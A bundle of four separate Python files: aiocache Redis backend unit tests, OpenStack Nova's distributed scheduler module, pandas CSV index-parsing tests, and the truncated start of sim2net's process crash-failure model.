from aiocache.backends.redis import RedisBackend, conn, AIOREDIS_BEFORE_ONE
@pytest.fixture
def redis_connection():
conn = MagicMock()
conn.__enter__ = MagicMock(return_value=conn)
conn.__exit__ = MagicMock()
conn.get = CoroutineMock()
conn.mget = CoroutineMock()
conn.set = CoroutineMock()
conn.setex = CoroutineMock()
conn.mset = CoroutineMock()
conn.incrby = CoroutineMock()
conn.exists = CoroutineMock()
conn.persist = CoroutineMock()
conn.expire = CoroutineMock()
conn.delete = CoroutineMock()
conn.flushdb = CoroutineMock()
conn.eval = CoroutineMock()
conn.keys = CoroutineMock()
conn.multi_exec = MagicMock(return_value=conn)
conn.execute = CoroutineMock()
return conn
@pytest.fixture
def redis_pool(redis_connection):
class FakePool:
def __await__(self):
yield
return redis_connection
pool = FakePool()
pool._conn = redis_connection
pool.release = CoroutineMock()
pool.clear = CoroutineMock()
pool.acquire = CoroutineMock(return_value=redis_connection)
pool.__call__ = MagicMock(return_value=pool)
return pool
@pytest.fixture
def redis(redis_pool):
redis = RedisBackend()
redis._pool = redis_pool
yield redis
@pytest.fixture
def create_pool():
with patch("aiocache.backends.redis.aioredis.create_pool") as create_pool:
yield create_pool
@pytest.fixture(autouse=True)
def mock_redis_v1(mocker, redis_connection):
mocker.patch("aiocache.backends.redis.aioredis.Redis", return_value=redis_connection)
class TestRedisBackend:
def test_setup(self):
redis_backend = RedisBackend()
assert redis_backend.endpoint == "127.0.0.1"
assert redis_backend.port == 6379
assert redis_backend.db == 0
assert redis_backend.password is None
assert redis_backend.pool_min_size == 1
assert redis_backend.pool_max_size == 10
def test_setup_override(self):
redis_backend = RedisBackend(db=2, password="pass")
assert redis_backend.endpoint == "127.0.0.1"
assert redis_backend.port == 6379
assert redis_backend.db == 2
assert redis_backend.password == "pass"
def test_setup_casts(self):
redis_backend = RedisBackend(
db="2",
port="6379",
pool_min_size="1",
pool_max_size="10",
create_connection_timeout="1.5",
)
assert redis_backend.db == 2
assert redis_backend.port == 6379
assert redis_backend.pool_min_size == 1
assert redis_backend.pool_max_size == 10
assert redis_backend.create_connection_timeout == 1.5
@pytest.mark.asyncio
async def test_acquire_conn(self, redis, redis_connection):
assert await redis.acquire_conn() == redis_connection
@pytest.mark.asyncio
async def test_release_conn(self, redis):
conn = await redis.acquire_conn()
await redis.release_conn(conn)
if AIOREDIS_BEFORE_ONE:
redis._pool.release.assert_called_with(conn)
else:
redis._pool.release.assert_called_with(conn.connection)
@pytest.mark.asyncio
async def test_get_pool_sets_pool(self, redis, redis_pool, create_pool):
redis._pool = None
await redis._get_pool()
assert redis._pool == create_pool.return_value
@pytest.mark.asyncio
async def test_get_pool_reuses_existing_pool(self, redis):
redis._pool = "pool"
await redis._get_pool()
assert redis._pool == "pool"
@pytest.mark.asyncio
async def test_get_pool_locked(self, mocker, redis, create_pool):
redis._pool = None
mocker.spy(redis._pool_lock, "acquire")
mocker.spy(redis._pool_lock, "release")
assert await redis._get_pool() == create_pool.return_value
assert redis._pool_lock.acquire.call_count == 1
assert redis._pool_lock.release.call_count == 1
@pytest.mark.asyncio
async def test_get_pool_calls_create_pool(self, redis, create_pool):
redis._pool = None
await redis._get_pool()
if AIOREDIS_BEFORE_ONE:
create_pool.assert_called_with(
(redis.endpoint, redis.port),
db=redis.db,
password=redis.password,
loop=redis._loop,
encoding="utf-8",
minsize=redis.pool_min_size,
maxsize=redis.pool_max_size,
)
else:
create_pool.assert_called_with(
(redis.endpoint, redis.port),
db=redis.db,
password=redis.password,
loop=redis._loop,
encoding="utf-8",
minsize=redis.pool_min_size,
maxsize=redis.pool_max_size,
create_connection_timeout=redis.create_connection_timeout,
)
@pytest.mark.asyncio
async def test_get(self, redis, redis_connection):
await redis._get(pytest.KEY)
redis_connection.get.assert_called_with(pytest.KEY, encoding="utf-8")
@pytest.mark.asyncio
async def test_gets(self, mocker, redis, redis_connection):
mocker.spy(redis, "_get")
await redis._gets(pytest.KEY)
redis._get.assert_called_with(pytest.KEY, encoding="utf-8", _conn=ANY)
@pytest.mark.asyncio
async def test_set(self, redis, redis_connection):
await redis._set(pytest.KEY, "value")
redis_connection.set.assert_called_with(pytest.KEY, "value")
await redis._set(pytest.KEY, "value", ttl=1)
redis_connection.setex.assert_called_with(pytest.KEY, 1, "value")
@pytest.mark.asyncio
async def test_set_cas_token(self, mocker, redis, redis_connection):
mocker.spy(redis, "_cas")
await redis._set(pytest.KEY, "value", _cas_token="old_value", _conn=redis_connection)
redis._cas.assert_called_with(
pytest.KEY, "value", "old_value", ttl=None, _conn=redis_connection
)
@pytest.mark.asyncio
async def test_cas(self, mocker, redis, redis_connection):
mocker.spy(redis, "_raw")
await redis._cas(pytest.KEY, "value", "old_value", ttl=10, _conn=redis_connection)
redis._raw.assert_called_with(
"eval",
redis.CAS_SCRIPT,
[pytest.KEY],
["value", "old_value", "EX", 10],
_conn=redis_connection,
)
@pytest.mark.asyncio
async def test_cas_float_ttl(self, mocker, redis, redis_connection):
mocker.spy(redis, "_raw")
await redis._cas(pytest.KEY, "value", "old_value", ttl=0.1, _conn=redis_connection)
redis._raw.assert_called_with(
"eval",
redis.CAS_SCRIPT,
[pytest.KEY],
["value", "old_value", "PX", 100],
_conn=redis_connection,
)
@pytest.mark.asyncio
async def test_multi_get(self, redis, redis_connection):
await redis._multi_get([pytest.KEY, pytest.KEY_1])
redis_connection.mget.assert_called_with(pytest.KEY, pytest.KEY_1, encoding="utf-8")
@pytest.mark.asyncio
async def test_multi_set(self, redis, redis_connection):
await redis._multi_set([(pytest.KEY, "value"), (pytest.KEY_1, "random")])
redis_connection.mset.assert_called_with(pytest.KEY, "value", pytest.KEY_1, "random")
@pytest.mark.asyncio
async def test_multi_set_with_ttl(self, redis, redis_connection):
await redis._multi_set([(pytest.KEY, "value"), (pytest.KEY_1, "random")], ttl=1)
assert redis_connection.multi_exec.call_count == 1
redis_connection.mset.assert_called_with(pytest.KEY, "value", pytest.KEY_1, "random")
redis_connection.expire.assert_any_call(pytest.KEY, timeout=1)
redis_connection.expire.assert_any_call(pytest.KEY_1, timeout=1)
assert redis_connection.execute.call_count == 1
@pytest.mark.asyncio
async def test_add(self, redis, redis_connection):
await redis._add(pytest.KEY, "value")
redis_connection.set.assert_called_with(pytest.KEY, "value", exist=ANY, expire=None)
await redis._add(pytest.KEY, "value", 1)
redis_connection.set.assert_called_with(pytest.KEY, "value", exist=ANY, expire=1)
@pytest.mark.asyncio
async def test_add_existing(self, redis, redis_connection):
redis_connection.set.return_value = False
with pytest.raises(ValueError):
await redis._add(pytest.KEY, "value")
@pytest.mark.asyncio
async def test_add_float_ttl(self, redis, redis_connection):
await redis._add(pytest.KEY, "value", 0.1)
redis_connection.set.assert_called_with(pytest.KEY, "value", exist=ANY, pexpire=100)
@pytest.mark.asyncio
async def test_exists(self, redis, redis_connection):
redis_connection.exists.return_value = 1
await redis._exists(pytest.KEY)
redis_connection.exists.assert_called_with(pytest.KEY)
@pytest.mark.asyncio
async def test_expire(self, redis, redis_connection):
await redis._expire(pytest.KEY, ttl=1)
redis_connection.expire.assert_called_with(pytest.KEY, 1)
@pytest.mark.asyncio
async def test_increment(self, redis, redis_connection):
await redis._increment(pytest.KEY, delta=2)
redis_connection.incrby.assert_called_with(pytest.KEY, 2)
@pytest.mark.asyncio
async def test_increment_typerror(self, redis, redis_connection):
redis_connection.incrby.side_effect = aioredis.errors.ReplyError("msg")
with pytest.raises(TypeError):
await redis._increment(pytest.KEY, 2)
@pytest.mark.asyncio
async def test_expire_0_ttl(self, redis, redis_connection):
await redis._expire(pytest.KEY, ttl=0)
redis_connection.persist.assert_called_with(pytest.KEY)
@pytest.mark.asyncio
async def test_delete(self, redis, redis_connection):
await redis._delete(pytest.KEY)
redis_connection.delete.assert_called_with(pytest.KEY)
@pytest.mark.asyncio
async def test_clear(self, redis, redis_connection):
redis_connection.keys.return_value = ["nm:a", "nm:b"]
await redis._clear("nm")
redis_connection.delete.assert_called_with("nm:a", "nm:b")
@pytest.mark.asyncio
async def test_clear_no_keys(self, redis, redis_connection):
redis_connection.keys.return_value = []
await redis._clear("nm")
redis_connection.delete.assert_not_called()
@pytest.mark.asyncio
async def test_clear_no_namespace(self, redis, redis_connection):
await redis._clear()
assert redis_connection.flushdb.call_count == 1
@pytest.mark.asyncio
async def test_raw(self, redis, redis_connection):
await redis._raw("get", pytest.KEY)
await redis._raw("set", pytest.KEY, 1)
redis_connection.get.assert_called_with(pytest.KEY, encoding=ANY)
redis_connection.set.assert_called_with(pytest.KEY, 1)
@pytest.mark.asyncio
async def test_redlock_release(self, mocker, redis):
mocker.spy(redis, "_raw")
await redis._redlock_release(pytest.KEY, "random")
redis._raw.assert_called_with("eval", redis.RELEASE_SCRIPT, [pytest.KEY], ["random"])
@pytest.mark.asyncio
async def test_close_when_connected(self, redis):
await redis._raw("set", pytest.KEY, 1)
await redis._close()
assert redis._pool.clear.call_count == 1
@pytest.mark.asyncio
async def test_close_when_not_connected(self, redis, redis_pool):
redis._pool = None
await redis._close()
assert redis_pool.clear.call_count == 0
class TestConn:
async def dummy(self, *args, _conn=None, **kwargs):
pass
@pytest.mark.asyncio
async def test_conn(self, redis, redis_connection, mocker):
mocker.spy(self, "dummy")
d = conn(self.dummy)
await d(redis, "a", _conn=None)
self.dummy.assert_called_with(redis, "a", _conn=redis_connection)
@pytest.mark.asyncio
async def test_conn_reuses(self, redis, redis_connection, mocker):
mocker.spy(self, "dummy")
d = conn(self.dummy)
await d(redis, "a", _conn=redis_connection)
self.dummy.assert_called_with(redis, "a", _conn=redis_connection)
await d(redis, "a", _conn=redis_connection)
self.dummy.assert_called_with(redis, "a", _conn=redis_connection)
class TestRedisCache:
@pytest.fixture
def set_test_namespace(self, redis_cache):
redis_cache.namespace = "test"
yield
redis_cache.namespace = None
def test_name(self):
assert RedisCache.NAME == "redis"
def test_inheritance(self):
assert isinstance(RedisCache(), BaseCache)
def test_default_serializer(self):
assert isinstance(RedisCache().serializer, JsonSerializer)
@pytest.mark.parametrize(
"path,expected", [("", {}), ("/", {}), ("/1", {"db": "1"}), ("/1/2/3", {"db": "1"})]
)
def test_parse_uri_path(self, path, expected):
assert RedisCache().parse_uri_path(path) == expected
@pytest.mark.parametrize(
"namespace, expected",
([None, "test:" + pytest.KEY], ["", pytest.KEY], ["my_ns", "my_ns:" + pytest.KEY]),
)
def test_build_key_double_dot(self, set_test_namespace, redis_cache, namespace, expected):
assert redis_cache.build_key(pytest.KEY, namespace=namespace) == expected
def test_build_key_no_namespace(self, redis_cache):
assert redis_cache.build_key(pytest.KEY, namespace=None) == pytest.KEY
|
|
# Copyright (c) 2011 Openstack, LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
The DistributedScheduler is for creating instances locally or across zones.
You can customize this scheduler by specifying your own Host Filters and
Weighing Functions.
"""
import json
import operator
import types
import M2Crypto
from nova.compute import api as compute_api
from novaclient import v1_1 as novaclient
from novaclient import exceptions as novaclient_exceptions
from nova import crypto
from nova import db
from nova import exception
from nova import flags
from nova import log as logging
from nova import rpc
from nova.scheduler import api
from nova.scheduler import driver
from nova.scheduler import filters
from nova.scheduler import least_cost
from nova.scheduler import scheduler_options
from nova import utils
FLAGS = flags.FLAGS
flags.DEFINE_list('default_host_filters', ['InstanceTypeFilter'],
'Which filters to use for filtering hosts when not specified '
'in the request.')
LOG = logging.getLogger('nova.scheduler.distributed_scheduler')
class InvalidBlob(exception.NovaException):
message = _("Ill-formed or incorrectly routed 'blob' data sent "
"to instance create request.")
class DistributedScheduler(driver.Scheduler):
"""Scheduler that can work across any nova deployment, from simple
deployments to multiple nested zones.
"""
def __init__(self, *args, **kwargs):
super(DistributedScheduler, self).__init__(*args, **kwargs)
self.cost_function_cache = {}
self.options = scheduler_options.SchedulerOptions()
def schedule(self, context, topic, method, *args, **kwargs):
"""The schedule() contract requires we return the one
best-suited host for this request.
NOTE: We're only focused on compute instances right now,
so this method will always raise NoValidHost()."""
msg = _("No host selection for %s defined." % topic)
raise exception.NoValidHost(reason=msg)
def schedule_run_instance(self, context, request_spec, *args, **kwargs):
"""This method is called from nova.compute.api to provision
an instance. However we need to look at the parameters being
passed in to see if this is a request to:
1. Create build plan (a list of WeightedHosts) and then provision, or
2. Use the WeightedHost information in the request parameters
to simply create the instance (either in this zone or
a child zone).
returns a list of the instances created.
"""
elevated = context.elevated()
num_instances = request_spec.get('num_instances', 1)
LOG.debug(_("Attempting to build %(num_instances)d instance(s)") %
locals())
weighted_hosts = []
# Having a 'blob' hint means we've already provided a build plan.
# We need to turn this back into a WeightedHost object.
blob = request_spec.get('blob', None)
if blob:
weighted_hosts.append(self._make_weighted_host_from_blob(blob))
else:
# No plan ... better make one.
weighted_hosts = self._schedule(elevated, "compute", request_spec,
*args, **kwargs)
if not weighted_hosts:
raise exception.NoValidHost(reason=_(""))
instances = []
for num in xrange(num_instances):
if not weighted_hosts:
break
weighted_host = weighted_hosts.pop(0)
instance = None
if weighted_host.host:
instance = self._provision_resource_locally(elevated,
weighted_host, request_spec, kwargs)
else:
instance = self._ask_child_zone_to_create_instance(elevated,
weighted_host, request_spec, kwargs)
if instance:
instances.append(instance)
return instances
def select(self, context, request_spec, *args, **kwargs):
"""Select returns a list of weights and zone/host information
corresponding to the best hosts to service the request. Any
internal zone information will be encrypted so as not to reveal
anything about our inner layout.
"""
elevated = context.elevated()
weighted_hosts = self._schedule(elevated, "compute", request_spec,
*args, **kwargs)
return [weighted_host.to_dict() for weighted_host in weighted_hosts]
def _call_zone_method(self, context, method, specs, zones):
"""Call novaclient zone method. Broken out for testing."""
return api.call_zone_method(context, method, specs=specs, zones=zones)
def _provision_resource_locally(self, context, weighted_host, request_spec,
kwargs):
"""Create the requested resource in this Zone."""
instance = self.create_instance_db_entry(context, request_spec)
driver.cast_to_compute_host(context, weighted_host.host,
'run_instance', instance_id=instance['id'], **kwargs)
return driver.encode_instance(instance, local=True)
def _make_weighted_host_from_blob(self, blob):
"""Returns the decrypted blob as a WeightedHost object
or None if invalid. Broken out for testing.
"""
decryptor = crypto.decryptor(FLAGS.build_plan_encryption_key)
try:
json_entry = decryptor(blob)
# Extract our WeightedHost values
wh_dict = json.loads(json_entry)
host = wh_dict.get('host', None)
blob = wh_dict.get('blob', None)
zone = wh_dict.get('zone', None)
return least_cost.WeightedHost(wh_dict['weight'],
host=host, blob=blob, zone=zone)
except M2Crypto.EVP.EVPError:
raise InvalidBlob()
def _ask_child_zone_to_create_instance(self, context, weighted_host,
request_spec, kwargs):
"""Once we have determined that the request should go to one
of our children, we need to fabricate a new POST /servers/
call with the same parameters that were passed into us.
This request is always for a single instance.
Note that we have to reverse engineer from our args to get back the
image, flavor, ipgroup, etc. since the original call could have
come in from EC2 (which doesn't use these things).
"""
instance_type = request_spec['instance_type']
instance_properties = request_spec['instance_properties']
name = instance_properties['display_name']
image_ref = instance_properties['image_ref']
meta = instance_properties['metadata']
flavor_id = instance_type['flavorid']
reservation_id = instance_properties['reservation_id']
files = kwargs['injected_files']
zone = db.zone_get(context.elevated(), weighted_host.zone)
zone_name = zone.name
url = zone.api_url
LOG.debug(_("Forwarding instance create call to zone '%(zone_name)s'. "
"ReservationID=%(reservation_id)s") % locals())
nova = None
try:
# This operation is done as the caller, not the zone admin.
nova = novaclient.Client(zone.username, zone.password, None, url,
token=context.auth_token,
region_name=zone_name)
nova.authenticate()
except novaclient_exceptions.BadRequest, e:
raise exception.NotAuthorized(_("Bad credentials attempting "
"to talk to zone at %(url)s.") % locals())
# NOTE(Vek): Novaclient has two different calling conventions
# for this call, depending on whether you're using
# 1.0 or 1.1 API: in 1.0, there's an ipgroups
# argument after flavor_id which isn't present in
# 1.1. To work around this, all the extra
# arguments are passed as keyword arguments
# (there's a reasonable default for ipgroups in the
# novaclient call).
instance = nova.servers.create(name, image_ref, flavor_id,
meta=meta, files=files,
zone_blob=weighted_host.blob,
reservation_id=reservation_id)
return driver.encode_instance(instance._info, local=False)
def _adjust_child_weights(self, child_results, zones):
"""Apply the Scale and Offset values from the Zone definition
to adjust the weights returned from the child zones. Returns
a list of WeightedHost objects: [WeightedHost(), ...]
"""
weighted_hosts = []
for zone_id, result in child_results:
if not result:
continue
for zone_rec in zones:
if zone_rec['id'] != zone_id:
continue
for item in result:
try:
offset = zone_rec['weight_offset']
scale = zone_rec['weight_scale']
raw_weight = item['weight']
cooked_weight = offset + scale * raw_weight
weighted_hosts.append(least_cost.WeightedHost(
host=None, weight=cooked_weight,
zone=zone_id, blob=item['blob']))
except KeyError:
LOG.exception(_("Bad child zone scaling values "
"for Zone: %(zone_id)s") % locals())
return weighted_hosts
def _zone_get_all(self, context):
"""Broken out for testing."""
return db.zone_get_all(context)
def _get_configuration_options(self):
"""Fetch options dictionary. Broken out for testing."""
return self.options.get_configuration()
def _schedule(self, elevated, topic, request_spec, *args, **kwargs):
"""Returns a list of hosts that meet the required specs,
ordered by their fitness.
"""
if topic != "compute":
msg = _("Scheduler only understands Compute nodes (for now)")
raise NotImplementedError(msg)
instance_type = request_spec.get("instance_type", None)
if not instance_type:
msg = _("Scheduler only understands InstanceType-based" \
"provisioning.")
raise NotImplementedError(msg)
cost_functions = self.get_cost_functions()
ram_requirement_mb = instance_type['memory_mb']
disk_requirement_bg = instance_type['local_gb']
options = self._get_configuration_options()
# Find our local list of acceptable hosts by repeatedly
# filtering and weighing our options. Each time we choose a
# host, we virtually consume resources on it so subsequent
# selections can adjust accordingly.
# unfiltered_hosts_dict is {host : ZoneManager.HostInfo()}
unfiltered_hosts_dict = self.zone_manager.get_all_host_data(elevated)
unfiltered_hosts = unfiltered_hosts_dict.items()
num_instances = request_spec.get('num_instances', 1)
selected_hosts = []
for num in xrange(num_instances):
# Filter local hosts based on requirements ...
filtered_hosts = self._filter_hosts(topic, request_spec,
unfiltered_hosts, options)
if not filtered_hosts:
# Can't get any more locally.
break
LOG.debug(_("Filtered %(filtered_hosts)s") % locals())
# weighted_host = WeightedHost() ... the best
# host for the job.
weighted_host = least_cost.weighted_sum(cost_functions,
filtered_hosts, options)
LOG.debug(_("Weighted %(weighted_host)s") % locals())
selected_hosts.append(weighted_host)
# Now consume the resources so the filter/weights
# will change for the next instance.
weighted_host.hostinfo.consume_resources(disk_requirement_bg,
ram_requirement_mb)
# Next, tack on the host weights from the child zones
json_spec = json.dumps(request_spec)
all_zones = self._zone_get_all(elevated)
child_results = self._call_zone_method(elevated, "select",
specs=json_spec, zones=all_zones)
selected_hosts.extend(self._adjust_child_weights(
child_results, all_zones))
selected_hosts.sort(key=operator.attrgetter('weight'))
return selected_hosts[:num_instances]
def _get_filter_classes(self):
# Imported here to avoid circular imports
from nova.scheduler import filters
def get_itm(nm):
return getattr(filters, nm)
return [get_itm(itm) for itm in dir(filters)
if (type(get_itm(itm)) is types.TypeType)
and issubclass(get_itm(itm), filters.AbstractHostFilter)
and get_itm(itm) is not filters.AbstractHostFilter]
def _choose_host_filters(self, filters=None):
"""Since the caller may specify which filters to use we need
to have an authoritative list of what is permissible. This
function checks the filter names against a predefined set
of acceptable filters.
"""
if not filters:
filters = FLAGS.default_host_filters
if not isinstance(filters, (list, tuple)):
filters = [filters]
good_filters = []
bad_filters = []
filter_classes = self._get_filter_classes()
for filter_name in filters:
found_class = False
for cls in filter_classes:
if cls.__name__ == filter_name:
good_filters.append(cls())
found_class = True
break
if not found_class:
bad_filters.append(filter_name)
if bad_filters:
msg = ", ".join(bad_filters)
raise exception.SchedulerHostFilterNotFound(filter_name=msg)
return good_filters
def _filter_hosts(self, topic, request_spec, hosts, options):
"""Filter the full host list. hosts = [(host, HostInfo()), ...].
This method returns a subset of hosts, in the same format."""
selected_filters = self._choose_host_filters()
# TODO(sandy): We're only using InstanceType-based specs
# currently. Later we'll need to snoop for more detailed
# host filter requests.
instance_type = request_spec.get("instance_type", None)
if instance_type is None:
# No way to select; return the specified hosts.
return hosts
for selected_filter in selected_filters:
query = selected_filter.instance_type_to_filter(instance_type)
hosts = selected_filter.filter_hosts(hosts, query, options)
return hosts
def get_cost_functions(self, topic=None):
"""Returns a list of tuples containing weights and cost functions to
use for weighing hosts
"""
if topic is None:
# Schedulers only support compute right now.
topic = "compute"
if topic in self.cost_function_cache:
return self.cost_function_cache[topic]
cost_fns = []
for cost_fn_str in FLAGS.least_cost_functions:
if '.' in cost_fn_str:
short_name = cost_fn_str.split('.')[-1]
else:
short_name = cost_fn_str
cost_fn_str = "%s.%s.%s" % (
__name__, self.__class__.__name__, short_name)
if not (short_name.startswith('%s_' % topic) or
short_name.startswith('noop')):
continue
try:
# NOTE: import_class is somewhat misnamed since
# the weighing function can be any non-class callable
# (i.e., no 'self')
cost_fn = utils.import_class(cost_fn_str)
except exception.ClassNotFound:
raise exception.SchedulerCostFunctionNotFound(
cost_fn_str=cost_fn_str)
try:
flag_name = "%s_weight" % cost_fn.__name__
weight = getattr(FLAGS, flag_name)
except AttributeError:
raise exception.SchedulerWeightFlagNotFound(
flag_name=flag_name)
cost_fns.append((weight, cost_fn))
self.cost_function_cache[topic] = cost_fns
return cost_fns
|
|
"""
Tests that work on both the Python and C engines but do not have a
specific classification into the other test modules.
"""
from datetime import datetime
from io import StringIO
import os
import pytest
from pandas import (
DataFrame,
Index,
MultiIndex,
)
import pandas._testing as tm
xfail_pyarrow = pytest.mark.usefixtures("pyarrow_xfail")
@pytest.mark.parametrize(
"data,kwargs,expected",
[
(
"""foo,2,3,4,5
bar,7,8,9,10
baz,12,13,14,15
qux,12,13,14,15
foo2,12,13,14,15
bar2,12,13,14,15
""",
{"index_col": 0, "names": ["index", "A", "B", "C", "D"]},
DataFrame(
[
[2, 3, 4, 5],
[7, 8, 9, 10],
[12, 13, 14, 15],
[12, 13, 14, 15],
[12, 13, 14, 15],
[12, 13, 14, 15],
],
index=Index(["foo", "bar", "baz", "qux", "foo2", "bar2"], name="index"),
columns=["A", "B", "C", "D"],
),
),
(
"""foo,one,2,3,4,5
foo,two,7,8,9,10
foo,three,12,13,14,15
bar,one,12,13,14,15
bar,two,12,13,14,15
""",
{"index_col": [0, 1], "names": ["index1", "index2", "A", "B", "C", "D"]},
DataFrame(
[
[2, 3, 4, 5],
[7, 8, 9, 10],
[12, 13, 14, 15],
[12, 13, 14, 15],
[12, 13, 14, 15],
],
index=MultiIndex.from_tuples(
[
("foo", "one"),
("foo", "two"),
("foo", "three"),
("bar", "one"),
("bar", "two"),
],
names=["index1", "index2"],
),
columns=["A", "B", "C", "D"],
),
),
],
)
def test_pass_names_with_index(all_parsers, data, kwargs, expected):
parser = all_parsers
result = parser.read_csv(StringIO(data), **kwargs)
tm.assert_frame_equal(result, expected)
@xfail_pyarrow
@pytest.mark.parametrize("index_col", [[0, 1], [1, 0]])
def test_multi_index_no_level_names(all_parsers, index_col):
data = """index1,index2,A,B,C,D
foo,one,2,3,4,5
foo,two,7,8,9,10
foo,three,12,13,14,15
bar,one,12,13,14,15
bar,two,12,13,14,15
"""
headless_data = "\n".join(data.split("\n")[1:])
names = ["A", "B", "C", "D"]
parser = all_parsers
result = parser.read_csv(
StringIO(headless_data), index_col=index_col, header=None, names=names
)
expected = parser.read_csv(StringIO(data), index_col=index_col)
# No index names in headless data.
expected.index.names = [None] * 2
tm.assert_frame_equal(result, expected)
@xfail_pyarrow
def test_multi_index_no_level_names_implicit(all_parsers):
parser = all_parsers
data = """A,B,C,D
foo,one,2,3,4,5
foo,two,7,8,9,10
foo,three,12,13,14,15
bar,one,12,13,14,15
bar,two,12,13,14,15
"""
result = parser.read_csv(StringIO(data))
expected = DataFrame(
[
[2, 3, 4, 5],
[7, 8, 9, 10],
[12, 13, 14, 15],
[12, 13, 14, 15],
[12, 13, 14, 15],
],
columns=["A", "B", "C", "D"],
index=MultiIndex.from_tuples(
[
("foo", "one"),
("foo", "two"),
("foo", "three"),
("bar", "one"),
("bar", "two"),
]
),
)
tm.assert_frame_equal(result, expected)
@xfail_pyarrow
@pytest.mark.parametrize(
"data,expected,header",
[
("a,b", DataFrame(columns=["a", "b"]), [0]),
(
"a,b\nc,d",
DataFrame(columns=MultiIndex.from_tuples([("a", "c"), ("b", "d")])),
[0, 1],
),
],
)
@pytest.mark.parametrize("round_trip", [True, False])
def test_multi_index_blank_df(all_parsers, data, expected, header, round_trip):
# see gh-14545
parser = all_parsers
data = expected.to_csv(index=False) if round_trip else data
result = parser.read_csv(StringIO(data), header=header)
tm.assert_frame_equal(result, expected)
@xfail_pyarrow
def test_no_unnamed_index(all_parsers):
parser = all_parsers
data = """ id c0 c1 c2
0 1 0 a b
1 2 0 c d
2 2 2 e f
"""
result = parser.read_csv(StringIO(data), sep=" ")
expected = DataFrame(
[[0, 1, 0, "a", "b"], [1, 2, 0, "c", "d"], [2, 2, 2, "e", "f"]],
columns=["Unnamed: 0", "id", "c0", "c1", "c2"],
)
tm.assert_frame_equal(result, expected)
def test_read_duplicate_index_explicit(all_parsers):
data = """index,A,B,C,D
foo,2,3,4,5
bar,7,8,9,10
baz,12,13,14,15
qux,12,13,14,15
foo,12,13,14,15
bar,12,13,14,15
"""
parser = all_parsers
result = parser.read_csv(StringIO(data), index_col=0)
expected = DataFrame(
[
[2, 3, 4, 5],
[7, 8, 9, 10],
[12, 13, 14, 15],
[12, 13, 14, 15],
[12, 13, 14, 15],
[12, 13, 14, 15],
],
columns=["A", "B", "C", "D"],
index=Index(["foo", "bar", "baz", "qux", "foo", "bar"], name="index"),
)
tm.assert_frame_equal(result, expected)
@xfail_pyarrow
def test_read_duplicate_index_implicit(all_parsers):
data = """A,B,C,D
foo,2,3,4,5
bar,7,8,9,10
baz,12,13,14,15
qux,12,13,14,15
foo,12,13,14,15
bar,12,13,14,15
"""
parser = all_parsers
result = parser.read_csv(StringIO(data))
expected = DataFrame(
[
[2, 3, 4, 5],
[7, 8, 9, 10],
[12, 13, 14, 15],
[12, 13, 14, 15],
[12, 13, 14, 15],
[12, 13, 14, 15],
],
columns=["A", "B", "C", "D"],
index=Index(["foo", "bar", "baz", "qux", "foo", "bar"]),
)
tm.assert_frame_equal(result, expected)
@xfail_pyarrow
def test_read_csv_no_index_name(all_parsers, csv_dir_path):
parser = all_parsers
csv2 = os.path.join(csv_dir_path, "test2.csv")
result = parser.read_csv(csv2, index_col=0, parse_dates=True)
expected = DataFrame(
[
[0.980269, 3.685731, -0.364216805298, -1.159738, "foo"],
[1.047916, -0.041232, -0.16181208307, 0.212549, "bar"],
[0.498581, 0.731168, -0.537677223318, 1.346270, "baz"],
[1.120202, 1.567621, 0.00364077397681, 0.675253, "qux"],
[-0.487094, 0.571455, -1.6116394093, 0.103469, "foo2"],
],
columns=["A", "B", "C", "D", "E"],
index=Index(
[
datetime(2000, 1, 3),
datetime(2000, 1, 4),
datetime(2000, 1, 5),
datetime(2000, 1, 6),
datetime(2000, 1, 7),
]
),
)
tm.assert_frame_equal(result, expected)
@xfail_pyarrow
def test_empty_with_index(all_parsers):
# see gh-10184
data = "x,y"
parser = all_parsers
result = parser.read_csv(StringIO(data), index_col=0)
expected = DataFrame(columns=["y"], index=Index([], name="x"))
tm.assert_frame_equal(result, expected)
@xfail_pyarrow
def test_empty_with_multi_index(all_parsers):
# see gh-10467
data = "x,y,z"
parser = all_parsers
result = parser.read_csv(StringIO(data), index_col=["x", "y"])
expected = DataFrame(
columns=["z"], index=MultiIndex.from_arrays([[]] * 2, names=["x", "y"])
)
tm.assert_frame_equal(result, expected)
@xfail_pyarrow
def test_empty_with_reversed_multi_index(all_parsers):
data = "x,y,z"
parser = all_parsers
result = parser.read_csv(StringIO(data), index_col=[1, 0])
expected = DataFrame(
columns=["z"], index=MultiIndex.from_arrays([[]] * 2, names=["y", "x"])
)
tm.assert_frame_equal(result, expected)
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# (c) 2012-2013 Michal Kalewski <mkalewski at cs.put.poznan.pl>
#
# This file is a part of the Simple Network Simulator (sim2net) project.
# USE, MODIFICATION, COPYING AND DISTRIBUTION OF THIS SOFTWARE IS SUBJECT TO
# THE TERMS AND CONDITIONS OF THE MIT LICENSE. YOU SHOULD HAVE RECEIVED A COPY
# OF THE MIT LICENSE ALONG WITH THIS SOFTWARE; IF NOT, YOU CAN DOWNLOAD A COPY
# FROM HTTP://WWW.OPENSOURCE.ORG/.
#
# For bug reports, feature and support requests please visit
# <https://github.com/mkalewski/sim2net/issues>.
"""
This module provides an implementation of the crash model.
In the crash model ([CGR11]_), processes at some time may simply stop to
execute any steps, and if this is the case, the faulty processes never recover.
In this implementation, a failure for each process is determined randomly with
the use of the given *crash probability* that indicates the probability that a
process will crash during the total simulation time. By the method used, times
at which processes crash will be distributed uniformly in the total simulation
time. There is also a possibility to setup a *transient period* (at the
beginning of the simulation), during which process failures do not occur, and
the total number of faulty processes can also be limited to a given value.
"""
import operator
from sim2net.failure._failure import Failure
from sim2net.utility.validation import check_argument_type
__docformat__ = 'reStructuredText'
#pylint: disable=R0913
class Crash(Failure):
"""
This class implements the process crash model.
.. note::
It is presumed that the :meth:`node_failure` method is called at each
step of the simulation.
"""
def __init__(self, time, nodes_number, crash_probability,
maximum_crash_number, total_simulation_steps,
transient_steps=0):
"""
*Parameters*:
- **time**: a simulation time object of the
:class:`sim2net._time.Time` class;
- **nodes_number** (`int`): the total number of nodes in the
simulated network;
- **crash_probability** (`float`): the probability that a single
process will crash during the total simulation time;
